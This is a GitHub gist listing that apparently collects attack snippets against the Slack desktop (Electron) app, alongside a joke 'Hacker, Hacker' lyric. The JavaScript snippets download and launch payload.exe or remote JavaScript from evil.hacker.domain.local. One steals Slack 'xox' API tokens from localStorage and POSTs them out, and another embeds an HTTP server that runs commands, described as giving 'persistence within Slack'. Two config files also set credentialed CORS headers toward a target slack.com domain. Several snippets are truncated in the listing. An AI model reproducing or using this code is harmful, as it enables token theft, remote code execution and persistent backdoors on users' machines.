Jonny Schnittger JonnySchnittger
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| To the theme music of Badger, Badger, Badger | |
| https://www.youtube.com/watch?v=EIyixC9NsLI | |
| Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker | |
| 0-day, 0-day, | |
| Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker | |
| 0-day, 0-day, | |
| Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker | |
| 0-day, | |
| Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener("DOMContentLoaded", function () { | |
| const { spawn } = require('child_process'); | |
| const subprocess = spawn('notepad.exe', [], { | |
| detached: true, | |
| stdio: 'ignore' | |
| }); | |
| subprocess.unref(); | |
| }); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener("DOMContentLoaded", function () { | |
| const { spawn } = require('child_process'); | |
| const fs = require('fs-extra'); | |
| const path = require('path'); | |
| const fileName = 'notepad.exe'; | |
| const localPath = path.join(process.cwd(), fileName); | |
| const remoteUri = 'https://evil.hacker.domain.local/payload.exe'; | |
| let saveAndLaunch = function(download) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <httpProtocol> | |
| <customHeaders> | |
| <add name="Access-Control-Allow-Origin" value="https://<your target domain>.slack.com" /> | |
| <add name="Access-Control-Allow-Methods" value="GET, PUT, POST, DELETE" /> | |
| <add name="Access-Control-Allow-Credentials" value="true" /> | |
| </customHeaders> | |
| </httpProtocol> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Header Set Access-Control-Allow-Origin "https://<your target domain>.slack.com" | |
| Header Set Access-Control-Allow-Methods" value="GET, PUT, POST, DELETE" | |
| Header Set Access-Control-Allow-Credentials value="true" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener("DOMContentLoaded", function () { | |
| const { webFrame } = require('electron') | |
| const https = require("https"); | |
| const remoteUri = 'https://evil.hacker.domain.local/payload.js'; | |
| let execute = function(script) { | |
| webFrame.executeJavaScript(script) | |
| }; | |
JonnySchnittger
/ localstorage.js
Created
July 17, 2019 23:27
Grab the API tokens and send them back
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for (var i = 0; i < localStorage.length; i++){ | |
| let key = localStorage.key(i); | |
| if(key.endsWith('static_translations')) { | |
| fetch('https://evil.hacker.domain.local', { method: 'POST', body: JSON.parse(localStorage.getItem(key)).data.args.token }); | |
| } else if(key.startsWith('xox')){ | |
| fetch('https://evil.hacker.domain.local', { method: 'POST', body: key }); | |
| } | |
| } |
JonnySchnittger
/ server.embed.js
Created
July 17, 2019 23:28
Embed a http server for persistence within Slack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.addEventListener("DOMContentLoaded", function () { | |
| const http = require('http'); | |
| const url = require('url'); | |
| const { spawnSync } = require('child_process'); | |
| const port = 7000; | |
| const contentType = { "Content-Type": "text/plain" }; | |
| const httpVerb = { | |
| GET: "GET", | |
| POST: "POST" |